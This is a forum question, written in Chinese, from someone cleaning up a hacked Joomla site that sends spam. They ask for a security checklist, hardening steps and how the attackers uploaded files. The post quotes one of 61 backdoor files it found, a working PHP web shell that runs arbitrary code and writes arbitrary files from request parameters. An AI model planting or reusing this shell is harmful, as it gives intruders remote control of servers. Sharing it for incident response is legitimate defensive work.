我有一个客户的 Joomla 网站被黑了,我不确定它是怎么发生的,但我可以看到有很多脚本在搜索包含单词eval 的文件时发送垃圾邮件(我发现 61 个匹配项,如下所示文件:
<?php
$lbdw = "495c05e857e328e1e65ca6b0bc03dc88";
if (isset($_REQUEST['tlhqdsj'])) {
$mglvq = $_REQUEST['tlhqdsj'];
eval($mglvq);
exit();
}
if (isset($_REQUEST['ofva'])) {
$ulmajcbk = $_REQUEST['tbun'];
$cdpumv = $_REQUEST['ofva'];
$tgcjl = fopen($cdpumv, 'w');
$ogrmbcz = fwrite($tgcjl, $ulmajcbk);
fclose($tgcjl);
echo $ogrmbcz;
exit();
}
?>
我不想删除整个网站,因为我没有开发它,我只需要一个安全检查表和一种搜索其他已知漏洞的方法。
我应该在安装此 Joomla 网站的服务器上采取哪些其他预防措施?
知道他们是如何将这么多文件上传到服务器的吗?